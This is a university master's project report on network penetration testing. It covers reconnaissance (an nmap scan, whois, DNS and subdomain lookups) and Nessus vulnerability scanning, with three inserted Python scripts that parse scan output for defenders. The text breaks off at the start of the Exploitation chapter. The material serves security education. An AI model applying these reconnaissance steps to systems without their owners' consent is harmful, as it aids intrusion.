
Vulnerability and Analysis of Network Penetration Testing

by

Md Yusuf Miah (Exam Roll: 172139)

A project report submitted to the Institute of Information Technology
in partial fulfilment of the requirements for the degree of
Professional Masters in Information Technology

Supervisor: Dr. Md Whaiduzzaman

Institute of Information Technology


Jahangirnagar University
Savar, Dhaka-1342
July, 2019

CERTIFICATE

The project titled “Vulnerability and Analysis of Network Penetration Testing”
submitted by Student: Md Yusuf Miah, ID: 172139, Session: May 2017, has been
accepted as satisfactory in partial fulfillment of the requirement for the degree of
Professional Masters in Information Technology on Date-of-Defense.

Dr. Md Whaiduzzaman
Supervisor

BOARD OF EXAMINERS

Ms. Fahima Tabassum, Associate Professor, IIT, JU: PMIT Coordinator

Dr. M. Mesbahuddin Sarker, Associate Professor, IIT, JU and Director, IIT: Member, PMIT Coordination Committee

Dr. M. Shamim Kaiser, Associate Professor, IIT, JU: Member, PMIT Coordination Committee

Dr. Risala Tasin Khan, Associate Professor, IIT, JU: Member, PMIT Coordination Committee

Dr. Md Abu Yousuf, Associate Professor, IIT, JU: Member, PMIT Coordination Committee

DECLARATION

I hereby declare that this project work is based on the results found by
myself. Materials of work found by other researchers are mentioned by reference.
This thesis, neither in whole nor in part, has been previously submitted for any
degree.

____________________
Md Yusuf Miah
PMIT: 172139

DEDICATION

This research paper is dedicated to my dear father, who has been the
inspiration for my studies as a whole until today, and my beloved mother who, for
months past, has encouraged me attentively with her fullest and truest attention to
accomplish my work with truthful self-confidence.

LIST OF TABLES AND FIGURES

Fig-1.1: Network Penetration Approach and Methodology

Fig-1.2: External and Internal Penetration Test

Fig-1.3: Analysis of Network Penetration Testing

Fig-2.1: OS Detection & Service Running & Port Finding

Fig-2.2: Firewall and Port Filtering

Fig-2.3: Whois Information

Fig-2.4: Actual IP Address Finding

Fig-2.5: Web Server Information

Fig-2.6: Subdomain Information

Fig-3.1: Black Box Network

Fig-3.2: White Box Network

Fig-3.3: Gray Box Network

Fig-3.4: Nessus

Fig-3.5: Add Scan

Fig-3.6: Scan Type Setting

Fig-3.7: Scan Type

Fig-3.8: Scan Result

Fig-3.9: Scan Report

Fig-4.1: Msfconsole Start

Fig-4.2: Use MS08-067-netapi

Fig-4.3: Set Payload

Fig-4.4: Set Payload

Fig-4.5: Run VNC

Fig-4.6: Victim M/C

Fig-4.7: Run Wireshark

Fig-4.8: Start Capturing

Fig-4.9: HTTP Request

Fig-4.10: Show POST Data

LIST OF ABBREVIATIONS

ISP     Internet Service Provider
IDS     Intrusion Detection System
DNS     Domain Name System
IP      Internet Protocol
TCP     Transmission Control Protocol
UDP     User Datagram Protocol
GUI     Graphical User Interface
NMAP    Network Mapper
ICMP    Internet Control Message Protocol
FTP     File Transfer Protocol
HTTP    Hypertext Transfer Protocol
IMAP    Internet Message Access Protocol
MS-SQL  Microsoft Structured Query Language
MySQL   My Structured Query Language
NCP     NetWare Core Protocol
NNTP    Network News Transfer Protocol
POP3    Post Office Protocol 3
REXEC   Remote Execution
RLOGIN  Remote Login
SMTP    Simple Mail Transfer Protocol
SNMP    Simple Network Management Protocol
SSHV2   Secure Shell Version 2
VNC     Virtual Network Computing

ACKNOWLEDGEMENT

In completing this Post Graduate project I have been fortunate to have support
and encouragement from many people. I would like to acknowledge them for their
co-operation.

First, I would like to thank Dr. Md Whaiduzzaman, my project supervisor, for
guiding me through each and every step of the process with knowledge and
support. Thank you for your advice, guidance and assistance.

I would like to express my utmost gratitude to the IIT of Jahangirnagar University
for providing me the opportunity to pursue the project as a partial fulfillment of
the requirement for the degree of Professional Master's in Information Technology
(PMIT).

I also feel fortunate to be blessed with the guidance and encouragement of my
faculty members. And I remember my friends who helped and supported me a lot.

ABSTRACT

With the emergence of network globalization and the advent of the internet as the major
tool for international exchange of information, security has always been the most
talked-about topic. Although there are many ways to secure systems and
applications, the only way to truly know how to secure the network is to test it using
some testing procedures.

Hacking and penetration testing is a testing procedure that is performed to test the
perimeter of a network for security breaches and vulnerabilities. Penetration testing
is also known as ethical hacking because the test is performed by a team of security
experts that have the organization’s permission to hack the network in an attempt to
identify vulnerabilities.

If vulnerabilities are discovered, it helps the organization to defend itself against
further attacks. By using the same tools and methodologies hackers use,
administrators can test their security procedures and discover vulnerabilities before
they are exploited by someone else.

Any security issues that are found will be presented to the system owner, together
with an assessment of their impact, and often with a proposal for mitigation or a
technical solution. Thus all the work is done in a proper manner.

Keywords: vulnerability, attack, penetration testing, Kali Linux, BackTrack 5 R3,
Zenmap, Nessus, authentication, Professional Master's in Information Technology
(PMIT).

TABLE OF CONTENTS

Certificate
Candidate’s Declaration
Dedication
List of Tables and Figures
List of Abbreviations
CHAPTER 1 Introduction ............................................... 1-8
1.0 Overview ............................................................ 1
1.1 Introduction ........................................................ 2
1.2 Objective of the Study .............................................. 3
1.3 Research Problem Statement .......................................... 4
1.4 Limitations and Delimitation of the Study ........................... 4
1.5 Internal Penetration Test ........................................... 5
1.6 External Penetration Test ........................................... 7
1.7 Approach ............................................................ 8
CHAPTER 2 Information Gathering ..................................... 9-15
2.1 Introduction ........................................................ 9
2.2 Service and OS Detection ........................................... 10
2.3 Topology ........................................................... 11
2.4 Whois Information .................................................. 12
2.5 IP Address ......................................................... 13
2.6 Web Server ......................................................... 14
2.7 Sub Domain ......................................................... 15
CHAPTER 3 Vulnerability Analysis of Network ........................ 16-24
3.1 Introduction ....................................................... 16
3.2 Black Box Network Vulnerability Assessment ......................... 17
3.3 White Box Network Vulnerability Assessment ......................... 18
3.4 Gray Box Network Vulnerability Assessment .......................... 19
3.5 Nessus Vulnerability Scanner ....................................... 20
CHAPTER 4 Exploitation ............................................. 25-33
4.1 Introduction ....................................................... 25
4.2 Scanning Phase ..................................................... 26
4.3 Packet Sniffers by Wireshark Tool .................................. 30
CHAPTER 5 Discussion and Conclusion ................................ 33-36
5.1 Analysis and Discussion ............................................ 33
5.2 Reflection on the Proposal Methodology ............................. 34
5.3 Contribution ....................................................... 35
5.4 Future Work ........................................................ 35
5.5 Conclusion ......................................................... 36
REFERENCES ............................................................. 37

CHAPTER 1

Introduction

1.0 Overview

The primary objective of an analysis of network penetration testing is to identify
exploitable vulnerabilities in applications before hackers are able to discover and
exploit them. Network penetration testing will reveal real-world opportunities for
hackers to compromise applications in such a way that allows for
unauthorized access to sensitive data or even take-over of systems for malicious/non-
business purposes.

This type of assessment is an attack simulation carried out by our highly trained
security consultants in an effort to:

• Identify application security flaws present in the environment
• Understand the level of risk for your organization
• Help address and fix identified application flaws

MIT Security’s network penetration testers have experience developing software
patches, not just trying to break it. They leverage this experience to zero in on critical
issues and provide actionable remediation guidance.

As a result of our penetration tests, you’ll be able to view your applications through
the eyes of both a hacker and an experienced developer to discover where you can
improve your security posture. Our consultants produce findings in written reports
and provide your team with the guidance necessary to effectively remediate any
issues we uncover.
1.1 Introduction

About two or three decades ago, people were quite happy to leave their houses and
cars unlocked due to low crime levels. However, times have changed and the
world is fast becoming an insecure place, especially for organizations which
deal with an influx of heavy data on a daily basis, since security has always been an
important issue due to network globalization and the internet. Ethical hacking
and penetration techniques are preventive measures which consist of a chain of
legitimate tools that identify and exploit a company’s security weaknesses. Ethical
hacking and penetration testing is a platform to find out flaws in network systems.
Vulnerability assessment takes center stage in finding the weaknesses of networks
and exploiting such vulnerabilities to demonstrate the weakness of the network. Penetration
testing in general involves a lot of techniques such as social engineering and
reconnaissance and, most importantly, methodologies for using the required tools. [1]

Explain (Fig-1.1): This is an overview of Network Penetration Testing. The primary
objective of a network penetration test is to identify exploitable vulnerabilities in
networks, systems, hosts and network devices (i.e. routers, switches) before hackers
are able to discover and exploit them.

Fig-1.1: Network Penetration Approach and Methodology [copied]

1.2 Objective of the Study

My main specific objective is to gain full knowledge in applying reconnaissance in
all categories of black box penetration testing, vulnerability assessment,
penetration testing and, most importantly, in achieving all these, the required tools to
mitigate such acts on a network. Accurate tools and methods are used to assess the flaws
found in a network system, to show how such weaknesses can be exploited, and to enable such
security vulnerabilities to be blocked from hackers.

The core specific objectives of this important study are as follows:
• The use of well-known software tools for hacking
• The importance of active and passive reconnaissance techniques
• Prevention of network systems information from entering the public domain
• Software tools for hacking countermeasures
• The need for penetration testing

1.3 Research Problem Statement
Ethical hacking and penetration testing is the practice of finding vulnerabilities in an
information system, where such acts are done in consultation with the owners of the
network. Notwithstanding, social engineering is the art of utilizing human behavior
to breach security without the participant even realizing that they have been
manipulated. Sometimes black hat hackers get their chance when there are genuine
gaps in the security that they can breach.
The problem statements of advanced hacking and penetration techniques are as
follows:
• Ninety percent (90%) of social engineering techniques are used for active
and passive reconnaissance of the targeted network.
• Weak, genuine security implementation gaps in networks.
• How to eliminate the two main categories of social engineering techniques:
  - Technology-based deception
  - Human-based deception
• Tools such as software and methods available to restrict black hat hackers
after applying a penetration test.
• Software tools used to identify vulnerabilities in information systems and
techniques to prevent such flaws.

1.4 Limitations and Delimitation of the Study

Penetration testing cannot be expected to identify all possible weaknesses, nor does it
guarantee that a system is 100% secure. New technology and hacking methods can create
new exposures not anticipated during the penetration testing. Thus, it is certainly
possible that after a penetration test there could be hacking incidents thereafter,
because it is impossible to have full, but rather only good, protection for an
organization’s security system.
Penetration testing involves taking computer screenshots or copying sensitive
information as evidence to prove that the system has key security weaknesses.
However, there are many restrictions on the extent of information that will be
available and legitimately accessible to the ethical hacker. This prevents a
penetration test from simulating the activities of malicious hackers as closely as possible,
because they are not constrained by any limitations. Firstly, penetration testing may
be governed by the laws and contractual obligations of the organization’s system,
because if the test unintentionally retrieves highly confidential information, this may
result in violating the laws and breaching contractual agreements.
This study is limited to:
• Getting the right information will not be possible.
• Acquiring the right or required software tools for penetration testing.
• Incorrect data will be collected when questionnaires are distributed in the
domains of Banks, Internet Service Providers (ISP) and other data centers.
• Evaluating software tools without adequate features.

Delimitations of the study are:
• Full penetration testing
• Denial of service testing
• Scanning a network or systems
• Social engineering techniques
• To know varieties of software testing tools and how they are used.
• Learn all the techniques of active and passive reconnaissance

1.5 Internal Penetration Test

An Internal Penetration Test differs from a vulnerability assessment in that it actually
exploits the vulnerabilities to determine what information is actually exposed. An
Internal Penetration Test mimics the actions of an actual attacker exploiting
weaknesses in network security without the usual dangers. This test examines
internal IT systems for any weakness that could be used to disrupt the confidentiality,
availability or integrity of the network, thereby allowing the organization to address
each weakness. [2]
• Internal Network Scanning
• Port Scanning
• Exploit Research
• Manual Vulnerability Testing and Verification
• Manual Configuration Weakness Testing and Verification
• Limited Application Layer Testing
• Firewall and ACL Testing
• Administrator Privileges Escalation Testing
• Password Strength Testing
• Network Equipment Security Controls Testing
• Database Security Controls Testing
• Internal Network Scan for Known Trojans

Explain (Fig-1.2): This is an overview of External and Internal Penetration Testing.
The testing steps are in many ways alike for external and internal tests.

Fig-1.2: External and Internal Penetration Test [copied]

1.6 External Penetration Test
An External Penetration Test differs from a vulnerability assessment in that it
actually exploits the vulnerabilities to determine what information is actually
exposed to the outside world. An External Penetration Test mimics the actions of an
actual attacker exploiting weaknesses in the network security without the usual
dangers. This test examines external IT systems for any weakness that could be used
by an external attacker to disrupt the confidentiality, availability or integrity of the
network, thereby allowing the organization to address each weakness. [3]
• Footprinting
• Public Information & Information Leakage
• DNS Analysis & DNS Bruteforcing
• Port Scanning
• System Fingerprinting
• Services Probing
• Exploit Research
• Manual Vulnerability Testing and Verification of Identified Vulnerabilities
• Intrusion Detection/Prevention System Testing
• Password Service Strength Testing
• Remediation Retest (optional)

1.7 Approach
MIT Security’s network penetration testing service utilizes a comprehensive, risk-
based approach to manually identify critical application-centric vulnerabilities that
exist on all in-scope applications.

Explain (Fig-1.3): This is an overview of penetration testing and how the work of a
penetration test is carried out.

Fig-1.3: Analysis of Network Penetration Testing

CHAPTER 2

Information Gathering

2.1 Introduction
Network penetration testing is much like hunting. When you are going
to hunt a website down, you must know what you are really going to deal with; if
you know the enemy you are going to face, then you can prepare yourself for
that.

This is why Information Gathering is the first phase of penetration testing. But
now the question arises: what information are we going to collect, and where are we
going to get that information from? "Where and how."

2.1.1 There are two types of information gathering:
• Passive Information Gathering
• Active Information Gathering

I) Passive Information Gathering

Passive information gathering means collecting information from sources other than the
victim itself: we can discover information about targets without touching their systems
or involving the client.
For example, you can identify network boundaries, operating systems, open ports,
and web server software in use on the target without touching their system.

II) Active Information Gathering

Active information gathering can be defined as gathering all information directly
from the victim's or client's systems and premises.

2.2 Service and OS Detection
Most of you know what an operating system is, but if anyone is still confused
about why we need to know the OS: notice that the scan output is highlighted; for
example, open and closed ports are displayed in different colors. [4]
Explain (Fig-2.1): We’ve run an intense scan against a host with the IP address
10.10.110.2. A scan window contains five tabs, each displaying different aspects of
the scan results:
root@kali:~# nmap -T4 -A -v 10.10.110.2
-v = Increase verbosity level; use -vv or more for greater effect
-A = Detect OS and services

Fig-2.1: OS Detection & Service Running & Port Finding

2.3 Topology
Each circle on the diagram represents a host found on the network. If a host has fewer
than three open ports, it will be green; more than three but fewer than six open ports,
yellow; and more than six open ports, red. Hosts with filtered ports will have a
yellow padlock symbol next to them.

Explain (Fig-2.2): Topology displays an interactive view of the connections
between hosts in a network.

Fig-2.2: Firewall and Port Filtering
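The scan of section 2.2 and the colour rule of section 2.3 can be applied to nmap's own text output instead of being read off the Zenmap screen. The Python script below is an added example for this report, not code from the report or from the nmap project. It parses constructed nmap grepable (-oG) output for three hosts, applies the topology colour rule (fewer than three open ports green, three to six yellow, more than six red; a padlock whenever a port is filtered: treating exactly three and exactly six as yellow is an assumption about the rule's boundary cases) and, from the defender's side, lists the legacy services that carry logins in the clear (FTP, telnet, POP3 and similar) so they can be retired first. The sample output and the host addresses are constructed.

```python
# Added example: parse nmap -oG output and apply the Zenmap topology colouring.
# The sample data below is constructed, not the output of a real scan.

# Constructed nmap grepable output (what `nmap -T4 -A -v -oG - 10.10.110.0/29` prints);
# each Ports entry is formatted as port/state/protocol/owner/service/rpc/version/.
SAMPLE_OG = (
    "# Nmap 7.80 scan initiated as: nmap -T4 -A -v -oG - 10.10.110.0/29\n"
    "Host: 10.10.110.2 ()\tStatus: Up\n"
    "Host: 10.10.110.2 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1/, "
    "80/open/tcp//http//Apache httpd 2.4.38/, 445/filtered/tcp//microsoft-ds///"
    "\tIgnored State: closed (997)\n"
    "Host: 10.10.110.3 ()\tStatus: Up\n"
    "Host: 10.10.110.3 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, "
    "22/open/tcp//ssh//OpenSSH 7.9p1/, 25/open/tcp//smtp//Postfix smtpd/, "
    "80/open/tcp//http//nginx 1.14.2/"
    "\tIgnored State: closed (996)\n"
    "Host: 10.10.110.4 ()\tStatus: Up\n"
    "Host: 10.10.110.4 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, "
    "23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///, "
    "110/open/tcp//pop3///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///"
    "\tIgnored State: closed (992)\n"
    "# Nmap done: 3 IP addresses (3 hosts up) scanned\n"
)

# Services that send credentials unencrypted; each open one is a finding for the defender.
CLEARTEXT_SERVICES = {"ftp", "telnet", "pop3", "imap", "rlogin", "rexec"}


def parse_grepable(text):
    """Return {ip: [(port, state, proto, service, version), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("Ports: ", 1)[1].split("\t", 1)[0]
        entries = []
        for item in ports_field.split(", "):
            f = item.split("/")  # port/state/proto/owner/service/rpc/version/
            entries.append((int(f[0]), f[1], f[2], f[4], f[6]))
        hosts[ip] = entries
    return hosts


def classify(entries):
    """Apply the topology colour rule of section 2.3 to one host's port list."""
    open_ports = [port for port, state, *_ in entries if state == "open"]
    filtered = [port for port, state, *_ in entries if state == "filtered"]
    n = len(open_ports)
    if n < 3:
        colour = "green"
    elif n <= 6:  # assumed reading of the boundary cases three and six
        colour = "yellow"
    else:
        colour = "red"
    return {"open": open_ports, "filtered": filtered,
            "colour": colour, "padlock": bool(filtered)}


def topology(text):
    """Colour every host in the scan output, as the Zenmap topology view does."""
    return {ip: classify(entries) for ip, entries in parse_grepable(text).items()}


def cleartext_services(text):
    """List (ip, port, service) for open services that carry logins in the clear."""
    found = []
    for ip, entries in parse_grepable(text).items():
        for port, state, _proto, service, _version in entries:
            if state == "open" and service in CLEARTEXT_SERVICES:
                found.append((ip, port, service))
    return found


if __name__ == "__main__":
    for ip, info in topology(SAMPLE_OG).items():
        lock = " [padlock]" if info["padlock"] else ""
        print(f"{ip}: {info['colour']} ({len(info['open'])} open){lock}")
    for ip, port, service in cleartext_services(SAMPLE_OG):
        print(f"cleartext service {service} on {ip}:{port}")
```

Run a real scan with `-oG scan.gnmap` and feed the file's contents to `topology()` to get the same colouring for every host; the cleartext list is the shortest path from a scan to a remediation ticket.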

2.4 Whois Information
This is the most basic information about a domain. It shows the registration details
of the website, in which you can commonly see who registered the domain, on which
date it was registered, when it will expire, etc. This information may sometimes help
in social engineering, such as sending the registrant an email at the registered address, or
using the address, name or contact number in various social engineering tasks.

Explain (Fig-2.3): Find information on any domain name or IP. A large database of
whois information, DNS, domain names, name servers, etc.

Fig-2.3: Whois Information

2.5 IP Address
This one is for newbies: the IP address is the real address behind any
domain name, resolved by the name servers. Every box, or you can say every
system, has a unique IP address, for example 162.248.48.130. Using it,
computers communicate with each other. The IP address will help us target the network
as well as find open ports and other exploitable services on the system during
penetration testing.

Explain (Fig-2.4): The nslookup (which stands for name server lookup) command
finds name server information for domains by querying the Domain Name System.

Fig-2.4: Actual IP Address Finding

2.6 Web Server
The web server we are dealing with here is an application which runs on
an operating system and serves the web requests coming to the system. Apache,
Tomcat, IIS etc. are web servers running on an operating system; when any
web request is sent to a system they handle it and they are responsible for giving out
the response. Many times you can find exploits related to a web server and get a way
into the system using that exploit, and if you know which web server is being used
then it will help you to find out the default directories or known vulnerabilities for
that web server. [6]

Explain (Fig-2.5): Find information on the web server: which server software and PHP
version are in use.

Fig-2.5: Web Server Information

2.7 Sub Domain
If you do not know what subdomains are: subdomains are domains maintained
under a domain. For example, google.com is a domain name and mail.google.com is a
subdomain inside it. We need to collect all available subdomains for a website. In
many cases you may find hidden or private domains where they are maintaining
something private, and such applications are usually left vulnerable and exposed
because of the assumption that no one can reach them. [7]

Explain (Fig-2.6): A subdomain is a domain that is part of a larger domain; the only
domain that is not also a subdomain is the root domain. Notice that the output was
highlighted; for example, each subdomain is displayed with its IP address.

Fig-2.6: Subdomain Information
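Sections 2.4 to 2.7 gather whois data, IP addresses and subdomains one lookup at a time; the value for the organisation being tested lies in turning those answers into an inventory, so that the forgotten subdomains described above are found by the owner before anyone else. The Python script below is an added example, not code from the report or from any whois or DNS tool. It parses a constructed whois excerpt for the placeholder domain example.com (the field names follow the usual whois layout), computes how many days remain before the registration expires, and sorts constructed nslookup answers into buckets: hosts inside address ranges the organisation owns (assumed ranges), hosts resolving elsewhere, CNAMEs to third parties, and names that no longer resolve. All records, addresses and ranges are constructed.

```python
# Added example: inventory the whois and DNS data gathered in sections 2.4 to 2.7.
# Every record below is constructed; none of it comes from a real lookup.
import ipaddress
from datetime import datetime, timezone

# Constructed whois excerpt for the placeholder domain example.com.
WHOIS_TEXT = """\
Domain Name: EXAMPLE.COM
Registrar: Example Registrar, Inc.
Creation Date: 1995-08-14T04:00:00Z
Registry Expiry Date: 2020-03-15T04:00:00Z
Name Server: NS1.REGISTRAR.EXAMPLE
Name Server: NS2.REGISTRAR.EXAMPLE
Registrant Email: hostmaster@example.com
"""

# Date the report was written, used so the expiry calculation is reproducible.
REPORT_DATE = datetime(2019, 7, 1, tzinfo=timezone.utc)

# Address ranges the organisation is assumed to own.
OWNED_RANGES = [ipaddress.ip_network("162.248.48.0/24"),
                ipaddress.ip_network("10.0.0.0/8")]

# Constructed DNS answers as nslookup would return them; None means the name did not resolve.
SAMPLE_RECORDS = [
    ("www.example.com", "A", "162.248.48.130"),
    ("mail.example.com", "A", "162.248.48.25"),
    ("dev.example.com", "A", "10.20.1.7"),
    ("old-crm.example.com", "A", "203.0.113.9"),
    ("status.example.com", "CNAME", "status.hosted-vendor.example"),
    ("www2.example.com", "CNAME", "www.example.com"),
    ("ftp.example.com", "A", None),
]


def whois_field(text, key):
    """Return the value of the first whois line whose key matches (case-insensitive)."""
    for line in text.splitlines():
        k, _, v = line.partition(":")
        if k.strip().lower() == key.lower():
            return v.strip()
    return None


def days_until_expiry(text, today):
    """Days from `today` (a timezone-aware datetime) to the registry expiry date."""
    raw = whois_field(text, "Registry Expiry Date")
    expiry = datetime.strptime(raw, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return (expiry - today).days


def classify_subdomain(rtype, value, domain, owned):
    """Bucket one DNS answer by who controls the host it points at."""
    if value is None:
        return "unresolved"            # stale record, a candidate for removal
    if rtype == "CNAME":
        return "owned-alias" if value.endswith("." + domain) else "third-party"
    ip = ipaddress.ip_address(value)
    if any(ip in net for net in owned):
        return "internal" if ip.is_private else "owned-public"
    return "outside-owned-ranges"      # hosted somewhere the organisation does not control


def inventory(records, domain, owned):
    """Group subdomain names by bucket so each group can be reviewed by its owner."""
    buckets = {}
    for name, rtype, value in records:
        bucket = classify_subdomain(rtype, value, domain, owned)
        buckets.setdefault(bucket, []).append(name)
    return buckets


if __name__ == "__main__":
    print("registrar:", whois_field(WHOIS_TEXT, "Registrar"))
    print("days until expiry:", days_until_expiry(WHOIS_TEXT, REPORT_DATE))
    for bucket, names in inventory(SAMPLE_RECORDS, "example.com", OWNED_RANGES).items():
        print(f"{bucket}: {', '.join(names)}")
```

The "outside-owned-ranges", "third-party" and "unresolved" buckets are the ones to review first: they are the subdomains most likely to be hosting something nobody remembers, or pointing at infrastructure the organisation no longer controls.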

CHAPTER 3

Vulnerability Analysis of Network

3.1 Introduction
Vulnerability analysis, also known as vulnerability assessment, is a process that
defines, identifies, and classifies the security holes (vulnerabilities) in a computer,
network, or communications infrastructure. In addition, vulnerability analysis can
forecast the effectiveness of proposed countermeasures and evaluate their actual
effectiveness after they are put into use.

There are several types of vulnerability assessments. These include:

1. Host assessment: The assessment of critical servers, which may be vulnerable to
attacks if not adequately tested or not generated from a tested machine image.

2. Network and wireless assessment: The assessment of policies and practices to
prevent unauthorized access to private or public networks and network-accessible
resources.

3. Database assessment: The assessment of databases or big data systems for
vulnerabilities and misconfigurations, identifying rogue databases or insecure
dev/test environments, and classifying sensitive data across an organization’s
infrastructure.

4. Application scans: The identification of security vulnerabilities in web applications
and their source code by automated scans on the front-end or static/dynamic analysis
of source code.

The list of vulnerability assessment tools is quite long. Among the most well-known
are OpenVAS, Nessus, Nikto, Wireshark, W3af, BurpSuite, SQLMap, IBM
Application Security on Cloud, etc.

3.2 Black Box Network Vulnerability Assessment

The main task a cybersecurity team needs to do when performing a black box network
vulnerability assessment is to act like real hackers. According to this method, the
security team tries to find ways to get into the company’s network ‘from the outside.’
What can they see in this case? Public IP addresses, the external interface of a
firewall, systems located in the demilitarized zone (DMZ), etc. No administrator
privileges and no access to databases are provided to the ethical hackers. [8]

Explain (Fig-3.1): This is an overview of how corporate networks are organized and
how a black box network vulnerability assessment is carried out.

Fig-3.1: Black Box Network [copied]

3.3 White Box Network Vulnerability Assessment
If the cybersecurity team is to perform a white box network vulnerability assessment,
they look at the network ‘from the inside,’ having all the privileges of the network's
authorized users. They can see the entire network with its file servers and databases. The
security engineers have administrator access to all the servers inside the network.
Their aim is not just to scan the network for vulnerabilities, but also to check the
security of the configuration of the machines inside the network.

Explain (Fig-3.2): This is an overview of how corporate networks are organized and
how a white box network vulnerability assessment is carried out.

Fig-3.2: White Box Network [copied]

3.4 Gray Box Network Vulnerability Assessment
The third option is gray box network vulnerability assessment, which encompasses both
approaches but is closer to black box vulnerability assessment. Security engineers
conduct a gray box vulnerability assessment if they get some information on the
organization’s network, such as user login details, but they don’t get access to the
entire network.

Explain (Fig-3.3): This is an overview of how corporate networks are organized and
how a gray box network vulnerability assessment is carried out.

Fig-3.3: Gray Box Network [copied]

3.5 Nessus Vulnerability Scanner

Step 1: Get Nessus installed and fire it up!

Nessus is usually installed on localhost, and thus entering localhost in the browser followed by the
port number works well to access Nessus. You may have to log into Nessus with the
username and password that were provided during installation. [9]

Explain (Fig-3.4): This is the admin login page of the Nessus Vulnerability Scanner tool.

Fig-3.4: Nessus

Step 2: New Scan in Nessus
You can start a new scan by clicking on the New Scan button. You can also create
multiple scans depending on your requirements.

Explain (Fig-3.5): This is the starting page for adding a new scan in the Nessus Vulnerability
Scanner tool.

Fig-3.5: Add Scan

Step 3: Scan Type and Settings
You may have to enter scan details like the name of the scan, a description of the scan
and even the targets. This includes the IP addresses of the targets.

Explain (Fig-3.6): This is an overview of the target victim IP and the general settings of the
scanning system.

Fig-3.6: Scan Type Setting

Step 4: Scan Type
Depending on your package, you can select the type of scan that you are willing to
run. You may have to upgrade the package in order to run some special scans.

Explain (Fig-3.7): This is an overview of the scanning types, from which the one suited to the
target victim is chosen.

Fig-3.7: Scan Type

Step 5: Scan Results

Once the scan is complete, you will be greeted with the scan completed message.
You can click on the Vulnerabilities tab to see a list containing all the vulnerabilities
present on the machine. The red/critical vulnerabilities are the ones that need to be
fixed as a priority.

Explain (Fig-3.8): This is an overview of the scanning result. Now we see how many
vulnerabilities there are, critical or low.

Fig-3.8: Scan Result

Step 6: Detailed Report
You can also click on the name of a vulnerability to find a detailed report about the
vulnerability and the available fix.

Explain (Fig-3.9): This is an overview of the detailed description of a scanning result, giving
the specific description of a critical vulnerability.

Fig-3.9: Scan Report
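Steps 5 and 6 read the results off the Nessus screen; a team that runs scans regularly will instead export them and triage the export so that the red/critical findings, and their fixes, reach the right owners. The Python script below is an added example, not code from the report or from Tenable. It parses a constructed export in the .nessus format (the NessusClientData_v2 XML layout, with one ReportHost per machine and one ReportItem per finding), counts findings per severity as the results page does, and lists High and Critical findings first together with the solution text. The hosts, plugin IDs, names, scores and solution texts in the sample are constructed placeholders; MS08-067 is the only identifier taken from the report itself.

```python
# Added example: triage a Nessus export (.nessus XML, NessusClientData_v2 layout)
# the way the scan results page of steps 5 and 6 presents it, critical first.
# The export below is constructed; plugin IDs, scores and texts are placeholders.
import xml.etree.ElementTree as ET

SAMPLE_NESSUS = """\
<NessusClientData_v2>
<Policy><policyName>Basic Network Scan</policyName></Policy>
<Report name="lab scan">
<ReportHost name="10.10.110.4">
<HostProperties><tag name="operating-system">Microsoft Windows XP</tag></HostProperties>
<ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="100001"
 pluginName="MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644)" pluginFamily="Windows">
<risk_factor>Critical</risk_factor><cvss_base_score>10.0</cvss_base_score>
<solution>Apply the vendor patch for MS08-067.</solution>
</ReportItem>
<ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2" pluginID="100002"
 pluginName="SMB Signing not required" pluginFamily="Misc.">
<risk_factor>Medium</risk_factor><cvss_base_score>5.3</cvss_base_score>
<solution>Enforce message signing in the host's configuration.</solution>
</ReportItem>
</ReportHost>
<ReportHost name="10.10.110.3">
<ReportItem port="80" svc_name="www" protocol="tcp" severity="3" pluginID="100003"
 pluginName="Unsupported Web Server Detection" pluginFamily="Web Servers">
<risk_factor>High</risk_factor><cvss_base_score>7.5</cvss_base_score>
<solution>Upgrade to a supported web server version.</solution>
</ReportItem>
<ReportItem port="21" svc_name="ftp" protocol="tcp" severity="2" pluginID="100004"
 pluginName="FTP Supports Cleartext Authentication" pluginFamily="FTP">
<risk_factor>Medium</risk_factor><cvss_base_score>4.3</cvss_base_score>
<solution>Switch to SFTP/FTPS or disable FTP.</solution>
</ReportItem>
</ReportHost>
<ReportHost name="10.10.110.2">
<ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0" pluginID="100005"
 pluginName="SSH Server Type and Version Information" pluginFamily="Service detection">
<risk_factor>None</risk_factor>
</ReportItem>
</ReportHost>
</Report>
</NessusClientData_v2>
"""

SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}


def parse_nessus(xml_text):
    """Flatten every ReportItem of every ReportHost into a list of finding dicts."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.findall("ReportItem"):
            sev = int(item.get("severity"))
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "severity": sev,
                "severity_name": SEVERITY_NAMES[sev],
                "plugin": item.get("pluginName"),
                "cvss": float(item.findtext("cvss_base_score") or 0.0),
                "solution": (item.findtext("solution") or "").strip(),
            })
    return findings


def summary(findings):
    """Count findings per severity, like the coloured bar on the scan results page."""
    counts = {name: 0 for name in SEVERITY_NAMES.values()}
    for f in findings:
        counts[f["severity_name"]] += 1
    return counts


def prioritised(findings, min_severity=3):
    """Findings at or above min_severity, ordered by severity, then CVSS, then host and port."""
    keep = [f for f in findings if f["severity"] >= min_severity]
    return sorted(keep, key=lambda f: (-f["severity"], -f["cvss"], f["host"], f["port"]))


if __name__ == "__main__":
    findings = parse_nessus(SAMPLE_NESSUS)
    print(summary(findings))
    for f in prioritised(findings):
        print(f"{f['severity_name']:8} {f['host']}:{f['port']}/{f['protocol']}  {f['plugin']}")
        print(f"         fix: {f['solution']}")
```

Exporting a real scan as Nessus format from the scan page and passing the file's contents to `parse_nessus()` gives the same list; lowering `min_severity` to 2 pulls the Medium findings into the queue once the critical ones are closed.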

CHAPTER 4

Exploitation

4.1 Introduction
Exploitation is the high point for every security engineer. It is a great feeling to exploit
a first machine and get full control over that machine. Exploitation is a very difficult
